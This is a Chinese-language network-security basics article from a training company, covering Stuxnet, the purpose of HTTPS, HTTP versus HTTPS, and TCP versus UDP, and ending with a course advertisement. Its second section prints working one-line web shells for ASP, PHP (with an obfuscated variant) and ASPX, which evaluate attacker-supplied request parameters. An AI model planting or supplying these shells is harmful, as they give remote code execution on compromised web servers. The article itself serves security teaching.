1.震網(wǎng)病毒：

　　指一種蠕蟲病毒，是第一個(gè)專門定向攻擊真實(shí)世界中基礎(chǔ)(能源)設(shè)施的“蠕蟲”病毒，比如核電站，水壩，國家電網(wǎng)。只要電腦操作員將被病毒感染的 U 盤插入 USB 接口，這種病毒就會(huì)在神不知鬼不覺的情況下(不會(huì)有任何其他操作要求或者提示出現(xiàn))取得一些工業(yè)用電腦系統(tǒng)的控制權(quán)。

　　與傳統(tǒng)的電腦病毒相比，“震網(wǎng)”病毒不會(huì)通過竊取個(gè)人隱私信息牟利。無需借助網(wǎng)絡(luò)連接進(jìn)行傳播。這種病毒可以破壞世界各國的化工、發(fā)電和電力傳輸企業(yè)所使用的核心生產(chǎn)控制電腦軟件，并且代替其對(duì)工廠其他電腦“發(fā)號(hào)施令”。極具毒性和破壞力。“震網(wǎng)”代碼非常精密，主要有兩個(gè)功能，一是使伊朗的離心機(jī)運(yùn)行失控，二是掩蓋發(fā)生故障的情況，“謊報(bào)軍情”，以“正常運(yùn)轉(zhuǎn)”記錄回傳給管理部門，造成決策的誤判。

　　2.一句話木馬　　

asp 一句話木馬：

<%execute(request("value"))%>

php 一句話木馬：<?php@eval($_POST[value]);?>

變形：<?php$x=$_GET[‘z’];@eval(“$x;”);?>

aspx 一句話木馬：

<%@ PageLanguage="Jscript"%>

<%eval(Request.Item["value"])%> 

　　3.Https 的作用

　　內(nèi)容加密建立一個(gè)信息安全通道，來保證數(shù)據(jù)傳輸?shù)陌踩?/p>

　　身份認(rèn)證確認(rèn)網(wǎng)站的真實(shí)性

　　數(shù)據(jù)完整性防止內(nèi)容被第三方冒充或者篡改

　　4.HTTPS 和 HTTP 的區(qū)別

　　https 協(xié)議需要到 CA 申請(qǐng)證書。

　　http 是超文本傳輸協(xié)議，信息是明文傳輸;https 則是具有安全性的 ssl 加密傳輸協(xié)議。

　　http 和 https 使用的是完全不同的連接方式，用的端口也不一樣，前者是 80，后者是 443。

　　http 的連接很簡單，是無狀態(tài)的;HTTPS 協(xié)議是由 SSL+HTTP 協(xié)議構(gòu)建的可進(jìn)行加密傳輸、身份認(rèn)證的網(wǎng)絡(luò)協(xié)議，比 http 協(xié)議安全。

　　5.TCP 和 UDP 的區(qū)別

　　TCP 協(xié)議和 UDP 協(xié)議特性區(qū)別總結(jié)：

　　1.TCP 協(xié)議在傳送數(shù)據(jù)段的時(shí)候要給段標(biāo)號(hào)；UDP 協(xié)議不用；

　　2.TCP 協(xié)議可靠；UDP 協(xié)議不可靠；

　　3.TCP 協(xié)議是面向連接；UDP 協(xié)議采用無連接；

　　4.TCP 協(xié)議負(fù)載較高，采用虛電路；UDP 采用無連接；

　　5.TCP 協(xié)議的發(fā)送方要確認(rèn)接收方是否收到數(shù)據(jù)段(3 次握手協(xié)議)；

　　6.TCP 協(xié)議采用窗口技術(shù)和流控制當(dāng)數(shù)據(jù)傳輸?shù)男阅鼙仨氉屛挥跀?shù)據(jù)傳輸?shù)耐暾?、可控制性和可靠性時(shí)，TCP協(xié)議是當(dāng)然的選擇。當(dāng)強(qiáng)調(diào)傳輸性能而不是傳輸?shù)耐暾詴r(shí)，如：音頻和多媒體應(yīng)用，UDP 是最好的選擇。在數(shù)據(jù)傳輸時(shí)間很短，以至于此前的連接過程成為整個(gè)流量主體的情況下，UDP 也是一個(gè)好的選擇，如：DNS 交換。把 SNMP建立在 UDP 上的部分原因是設(shè)計(jì)者認(rèn)為當(dāng)發(fā)生網(wǎng)絡(luò)阻塞時(shí)，UDP 較低的開銷使其有更好的機(jī)會(huì)去傳送管理數(shù)據(jù)。

　　TCP 豐富的功能有時(shí)會(huì)導(dǎo)致不可預(yù)料的性能低下，但是我們相信在不遠(yuǎn)的將來，TCP 可靠的點(diǎn)對(duì)點(diǎn)連接將會(huì)用于絕大多數(shù)的網(wǎng)絡(luò)應(yīng)用。

　　以上是網(wǎng)絡(luò)安全基礎(chǔ)知識(shí)大全第二波，后續(xù)會(huì)陸續(xù)進(jìn)行更新，請(qǐng)關(guān)注我們。更多關(guān)于網(wǎng)絡(luò)安全培訓(xùn)的問題，歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓(xùn)服務(wù)經(jīng)驗(yàn)，采用全程面授高品質(zhì)、高體驗(yàn)培養(yǎng)模式，擁有國內(nèi)一體化教學(xué)管理及學(xué)員服務(wù)，助力更多學(xué)員實(shí)現(xiàn)高薪夢想。